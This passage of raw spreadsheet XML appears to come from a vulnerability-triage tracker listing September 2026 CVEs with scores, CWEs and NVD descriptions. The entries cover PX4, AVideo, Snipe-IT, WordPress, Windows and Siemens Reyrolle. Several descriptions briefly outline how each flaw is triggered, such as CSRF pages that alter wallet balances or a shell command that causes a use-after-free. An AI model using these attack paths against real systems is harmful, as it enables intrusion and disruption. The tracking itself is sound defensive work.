r="P882" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q882" s="5" t="inlineStr" /><c r="R882" s="5" t="inlineStr"><is><t>CWE-1333</t></is></c><c r="S882" s="5" t="inlineStr"><is><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is></c><c r="T882" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86081</t></is></c></row><row r="883"><c r="A883" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B883" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C883" s="5" t="inlineStr"><is><t>CVE-2026-86713</t></is></c><c r="D883" s="5" t="n"><v>7.1</v></c><c r="E883" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F883" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G883" s="5" t="inlineStr" /><c r="H883" s="5" t="n"><v>0.004</v></c><c r="I883" s="5" t="inlineStr" /><c r="J883" s="5" t="inlineStr" /><c r="K883" s="5" t="inlineStr" /><c r="L883" s="5" t="inlineStr" /><c r="M883" s="5" t="inlineStr" /><c r="N883" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O883" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P883" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q883" s="5" t="inlineStr" /><c r="R883" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S883" s="5" t="inlineStr"><is><t>PX4 Autopilot through 1.17.0 contains a use-after-free vulnerability in the load_mon module's stop path where exit_and_cleanup() deletes the LoadMon object and frees the performance counter before perf_end() attempts to access it. Attackers can trigger this vulnerability by issuing the load_mon stop command from any PXH or MAVLink shell, causing reads and writes through freed memory that corrupt heap objects and destabilize the flight stack.</t></is></c><c r="T883" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86713</t></is></c></row><row r="884"><c r="A884" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B884" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C884" s="5" t="inlineStr"><is><t>CVE-2026-86718</t></is></c><c r="D884" s="5" t="n"><v>7.1</v></c><c r="E884" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F884" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G884" s="5" t="inlineStr" /><c r="H884" s="5" t="n"><v>0.002</v></c><c r="I884" s="5" t="inlineStr" /><c r="J884" s="5" t="inlineStr" /><c r="K884" s="5" t="inlineStr" /><c r="L884" s="5" t="inlineStr" /><c r="M884" s="5" t="inlineStr" /><c r="N884" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O884" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P884" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q884" s="5" t="inlineStr" /><c r="R884" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S884" s="5" t="inlineStr"><is><t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a cross-site request forgery vulnerability in deleteHistory.json.php and finishAll.json.php that allows unauthenticated attackers to mutate live history by making GET requests without CSRF token validation. Attackers can craft malicious pages that trigger administrator browsers to delete all live transmission history or mark streams as finished when an admin visits the attacker-controlled site.</t></is></c><c r="T884" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86718</t></is></c></row><row r="885"><c r="A885" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B885" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C885" s="5" t="inlineStr"><is><t>CVE-2026-86724</t></is></c><c r="D885" s="5" t="n"><v>7.1</v></c><c r="E885" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F885" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G885" s="5" t="inlineStr" /><c r="H885" s="5" t="n"><v>0.001</v></c><c r="I885" s="5" t="inlineStr" /><c r="J885" s="5" t="inlineStr" /><c r="K885" s="5" t="inlineStr" /><c r="L885" s="5" t="inlineStr" /><c r="M885" s="5" t="inlineStr" /><c r="N885" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O885" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P885" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q885" s="5" t="inlineStr" /><c r="R885" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S885" s="5" t="inlineStr"><is><t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a cross-site request forgery vulnerability in plugin/YPTWallet/view/saveBalance.php that allows attackers to set arbitrary wallet balances by relying only on session cookies without token validation. Attackers can craft a malicious webpage that, when loaded by an administrator, submits a POST request to modify any user's wallet balance to any value.</t></is></c><c r="T885" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86724</t></is></c></row><row r="886"><c r="A886" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B886" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C886" s="5" t="inlineStr"><is><t>CVE-2026-86725</t></is></c><c r="D886" s="5" t="n"><v>7.1</v></c><c r="E886" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F886" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G886" s="5" t="inlineStr" /><c r="H886" s="5" t="n"><v>0.003</v></c><c r="I886" s="5" t="inlineStr" /><c r="J886" s="5" t="inlineStr" /><c r="K886" s="5" t="inlineStr" /><c r="L886" s="5" t="inlineStr" /><c r="M886" s="5" t="inlineStr" /><c r="N886" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O886" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P886" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q886" s="5" t="inlineStr" /><c r="R886" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S886" s="5" t="inlineStr"><is><t>AVideo through c3edcc274c389816d434acadac07ee78eaf330c1 contains a missing authorization vulnerability in the SocialMediaPublisher plugin's add.json.php endpoint that allows authenticated users to modify other users' OAuth token records. Attackers can supply arbitrary row IDs to overwrite another user's stored access_token and refresh_token, then delete the compromised record to destroy the victim's provider linkage.</t></is></c><c r="T886" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86725</t></is></c></row><row r="887"><c r="A887" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B887" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C887" s="5" t="inlineStr"><is><t>CVE-2026-86734</t></is></c><c r="D887" s="5" t="n"><v>7.1</v></c><c r="E887" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F887" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G887" s="5" t="inlineStr" /><c r="H887" s="5" t="n"><v>0.003</v></c><c r="I887" s="5" t="inlineStr" /><c r="J887" s="5" t="inlineStr" /><c r="K887" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L887" s="5" t="inlineStr" /><c r="M887" s="5" t="inlineStr" /><c r="N887" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O887" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P887" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q887" s="5" t="inlineStr" /><c r="R887" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S887" s="5" t="inlineStr"><is><t>Snipe-IT before 8.7.1 fails to validate the length of the note field in the POST /account/accept/{acceptance} endpoint, allowing authenticated users to submit unbounded input that reaches synchronous CommonMark rendering. Attackers can submit large note values to exhaust PHP worker CPU and cause denial of service through resource exhaustion in the markdown parsing pipeline.</t></is></c><c r="T887" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86734</t></is></c></row><row r="888"><c r="A888" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B888" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C888" s="5" t="inlineStr"><is><t>CVE-2026-9331</t></is></c><c r="D888" s="5" t="n"><v>7.1</v></c><c r="E888" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F888" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G888" s="5" t="inlineStr" /><c r="H888" s="5" t="n"><v>0.002</v></c><c r="I888" s="5" t="inlineStr" /><c r="J888" s="5" t="inlineStr" /><c r="K888" s="5" t="inlineStr" /><c r="L888" s="5" t="inlineStr" /><c r="M888" s="5" t="inlineStr" /><c r="N888" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O888" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P888" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q888" s="5" t="inlineStr" /><c r="R888" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S888" s="5" t="inlineStr"><is><t>The EDD Product Catalog Feed by PixelYourSite plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to a missing capability check on the wpeddpcf_delete_feed function in all versions up to, and including, 1.0.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary option values on the WordPress site. This can be leveraged to delete an option that would create an error on the site and deny service to legitimate users.</t></is></c><c r="T888" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9331</t></is></c></row><row r="889"><c r="A889" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B889" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C889" s="5" t="inlineStr"><is><t>CVE-2026-50349</t></is></c><c r="D889" s="5" t="n"><v>7</v></c><c r="E889" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F889" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G889" s="5" t="inlineStr" /><c r="H889" s="5" t="n"><v>0.002</v></c><c r="I889" s="5" t="inlineStr" /><c r="J889" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K88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89" s="5" t="inlineStr" /><c r="M889" s="5" t="inlineStr" /><c r="N889" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O889" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P889" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q889" s="5" t="inlineStr" /><c r="R889" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S889" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T889" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-50349</t></is></c></row><row r="890"><c r="A890" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B890" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C890" s="5" t="inlineStr"><is><t>CVE-2026-58848</t></is></c><c r="D890" s="5" t="n"><v>7</v></c><c r="E890" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F890" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G890" s="5" t="inlineStr" /><c r="H890" s="5" t="n"><v>0.001</v></c><c r="I890" s="5" t="inlineStr" /><c r="J890" s="5" t="inlineStr" /><c r="K890" s="5" t="inlineStr" /><c r="L890" s="5" t="inlineStr" /><c r="M890" s="5" t="inlineStr" /><c r="N890" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O890" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P890" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q890" s="5" t="inlineStr" /><c r="R890" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S890" s="5" t="inlineStr"><is><t>In multiple functions of alloc.c, there is a possible unauthorized read/write access due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T890" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58848</t></is></c></row><row r="891"><c r="A891" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B891" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C891" s="5" t="inlineStr"><is><t>CVE-2026-62653</t></is></c><c r="D891" s="5" t="n"><v>7</v></c><c r="E891" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F891" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G891" s="5" t="inlineStr" /><c r="H891" s="5" t="n"><v>0.002</v></c><c r="I891" s="5" t="inlineStr" /><c r="J891" s="5" t="inlineStr" /><c r="K891" s="5" t="inlineStr" /><c r="L891" s="5" t="inlineStr" /><c r="M891" s="5" t="inlineStr" /><c r="N891" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O891" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P891" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q891" s="5" t="inlineStr" /><c r="R891" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S891" s="5" t="inlineStr"><is><t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). The input received over a proprietary communication protocol that is exposed when the device is placed into a special firmware-update mode is not properly validated, resulting in a memory corruption condition. This could allow an unauthenticated attacker with physical access to the device to cause a crash and potentially execute arbitrary code on the device.</t></is></c><c r="T891" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62653</t></is></c></row><row r="892"><c r="A892" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B892" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C892" s="5" t="inlineStr"><is><t>CVE-2026-62654</t></is></c><c r="D892" s="5" t="n"><v>7</v></c><c r="E892" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F892" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G892" s="5" t="inlineStr" /><c r="H892" s="5" t="n"><v>0.001</v></c><c r="I892" s="5" t="inlineStr" /><c r="J892" s="5" t="inlineStr" /><c r="K892" s="5" t="inlineStr" /><c r="L892" s="5" t="inlineStr" /><c r="M892" s="5" t="inlineStr" /><c r="N892" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O892" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P892" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q892" s="5" t="inlineStr" /><c r="R892" s="5" t="inlineStr"><is><t>CWE-494</t></is></c><c r="S892" s="5" t="inlineStr"><is><t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). A special maintenance mode can be activated via a physical key sequence during device boot, in which the device downloads and executes program code from a network server without verifying its authenticity or integrity. This could allow an attacker with physical access to the device to upload and execute arbitrary, unsigned code.</t></is></c><c r="T892" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62654</t></is></c></row><row r="893"><c r="A893" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B893" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C893" s="5" t="inlineStr"><is><t>CVE-2026-62694</t></is></c><c r="D893" s="5" t="n"><v>7</v></c><c r="E893" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F893" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G893" s="5" t="inlineStr" /><c r="H893" s="5" t="n"><v>0.003</v></c><c r="I893" s="5" t="inlineStr" /><c r="J893" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K89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93" s="5" t="inlineStr" /><c r="M893" s="5" t="inlineStr" /><c r="N893" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O893" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P893" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q893" s="5" t="inlineStr" /><c r="R893" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S893" s="5" t="inlineStr"><is><t>Use after free in Windows Installer allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T893" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62694</t></is></c></row><row r="894"><c r="A894" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B894" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C894" s="5" t="inlineStr"><is><t>CVE-2026-68824</t></is></c><c r="D894" s="5" t="n"><v>7</v></c><c r="E894" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F894" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G894" s="5" t="inlineStr" /><c r="H894" s="5" t="n"><v>0.002</v></c><c r="I894" s="5" t="inlineStr" /><c r="J894" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K894" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L894" s="5" t="inlineStr" /><c r="M894" s="5" t="inlineStr" /><c r="N894" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O894" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P894" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q894" s="5" t="inlineStr" /><c r="R894" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S894" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T894" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68824</t></is></c></row><row r="895"><c r="A895" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B895" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C895" s="5" t="inlineStr"><is><t>CVE-2026-68825</t></is></c><c r="D895" s="5" t="n"><v>7</v></c><c r="E895" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F895" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G895" s="5" t="inlineStr" /><c r="H895" s="5" t="n"><v>0.003</v></c><c r="I895" s="5" t="inlineStr" /><c r="J895" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K895" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L895" s="5" t="inlineStr" /><c r="M895" s="5" t="inlineStr" /><c r="N895" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O895" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P895" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q895" s="5" t="inlineStr" /><c r="R895" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S895" s="5" t="inlineStr"><is><t>Use after free in Windows Bind Filter Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T895" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68825</t></is></c></row><row r="896"><c r="A896" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B896" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C896" s="5" t="inlineStr"><is><t>CVE-2026-68837</t></is></c><c r="D896" s="5" t="n"><v>7</v></c><c r="E896" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F896" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G896" s="5" t="inlineStr" /><c r="H896" s="5" t="n"><v>0.002</v></c><c r="I896" s="5" t="inlineStr" /><c r="J896" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K8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896" s="5" t="inlineStr" /><c r="M896" s="5" t="inlineStr" /><c r="N896" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O896" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P896" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q896" s="5" t="inlineStr" /><c r="R896" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S896" s="5" t="inlineStr"><is><t>Use after free in Windows File History Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T896" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68837</t></is></c></row><row r="897"><c r="A897" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B897" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C897" s="5" t="inlineStr"><is><t>CVE-2026-68840</t></is></c><c r="D897" s="5" t="n"><v>7</v></c><c r="E897" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F897" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G897" s="5" t="inlineStr" /><c r="H897" s="5" t="n"><v>0.002</v></c><c r="I897" s="5" t="inlineStr" /><c r="J897" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K89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897" s="5" t="inlineStr" /><c r="M897" s="5" t="inlineStr" /><c r="N897" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O897" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P897" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q897" s="5" t="inlineStr" /><c r="R897" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S897" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T897" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68840</t></is></c></row><row r="898"><c r="A898" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B898" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C898" s="5" t="inlineStr"><is><t>CVE-2026-68847</t></is></c><c r="D898" s="5" t="n"><v>7</v></c><c r="E898" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F898" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G898" s="5" t="inlineStr" /><c r="H898" s="5" t="n"><v>0.002</v></c><c r="I898" s="5" t="inlineStr" /><c r="J898" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K898" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L898" s="5" t="inlineStr" /><c r="M898" s="5" t="inlineStr" /><c r="N898" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O898" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P898" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q898" s="5" t="inlineStr" /><c r="R898" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S898" s="5" t="inlineStr"><is><t>Use after free in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T898" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68847</t></is></c></row><row r="899"><c r="A899" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B899" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C899" s="5" t="inlineStr"><is><t>CVE-2026-68884</t></is></c><c r="D899" s="5" t="n"><v>7</v></c><c r="E899" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F899" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G899" s="5" t="inlineStr" /><c r="H899" s="5" t="n"><v>0.003</v></c><c r="I899" s="5" t="inlineStr" /><c r="J899" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K89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899" s="5" t="inlineStr" /><c r="M899" s="5" t="inlineStr" /><c r="N899" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O899" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P899" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q899" s="5" t="inlineStr" /><c r="R899" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S899" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Kernel allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T899" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68884</t></is></c></row><row r="900"><c r="A900" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B900" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C900" s="5" t="inlineStr"><is><t>CVE-2026-68897</t></is></c><c r="D900" s="5" t="n"><v>7</v></c><c r="E900" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F900" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G900" s="5" t="inlineStr" /><c r="H900" s="5" t="n"><v>0.002</v></c><c r="I900" s="5" t="inlineStr" /><c r="J900" s="5" t="inlineStr" /><c r="K900" s="5" t="inlineStr" /><c r="L900" s="5" t="inlineStr" /><c r="M900" s="5" t="inlineStr" /><c r="N900" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O900" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P900" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q900" s="5" t="inlineStr" /><c r="R900" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S900" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T900" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68897</t></is></c></row><row r="901"><c r="A901" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B901" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C901" s="5" t="inlineStr"><is><t>CVE-2026-69275</t></is></c><c r="D901" s="5" t="n"><v>7</v></c><c r="E901" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F901" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G901" s="5" t="inlineStr" /><c r="H901" s="5" t="n"><v>0.002</v></c><c r="I901" s="5" t="inlineStr" /><c r="J901" s="5" t="inlineStr" /><c r="K901" s="5" t="inlineStr" /><c r="L901" s="5" t="inlineStr" /><c r="M901" s="5" t="inlineStr" /><c r="N901" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O901" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P901" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q901" s="5" t="inlineStr" /><c r="R901" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S901" s="5" t="inlineStr"><is><t>Use after free in Kernel Streaming WOW Thunk Service Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T901" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69275</t></is></c></row><row r="902"><c r="A902" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B902" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C902" s="5" t="inlineStr"><is><t>CVE-2026-69279</t></is></c><c r="D902" s="5" t="n"><v>7</v></c><c r="E902" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F902" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G902" s="5" t="inlineStr" /><c r="H902" s="5" t="n"><v>0.003</v></c><c r="I902" s="5" t="inlineStr" /><c r="J902" s="5" t="inlineStr" /><c r="K902" s="5" t="inlineStr" /><c r="L902" s="5" t="inlineStr" /><c r="M902" s="5" t="inlineStr" /><c r="N902" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O902" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P902" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q902" s="5" t="inlineStr" /><c r="R902" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S902" s="5" t="inlineStr"><is><t>Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T902" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69279</t></is></c></row><row r="903"><c r="A903" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B903" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C903" s="5" t="inlineStr"><is><t>CVE-2026-69280</t></is></c><c r="D903" s="5" t="n"><v>7</v></c><c r="E903" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F903" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G903" s="5" t="inlineStr" /><c r="H903" s="5" t="n"><v>0.002</v></c><c r="I903" s="5" t="inlineStr" /><c r="J903" s="5" t="inlineStr" /><c r="K903" s="5" t="inlineStr" /><c r="L903" s="5" t="inlineStr" /><c r="M903" s="5" t="inlineStr" /><c r="N903" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O903" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P903" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q903" s="5" t="inlineStr" /><c r="R903" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S903" s="5" t="inlineStr"><is><t>Use after free in Windows Push Notifications 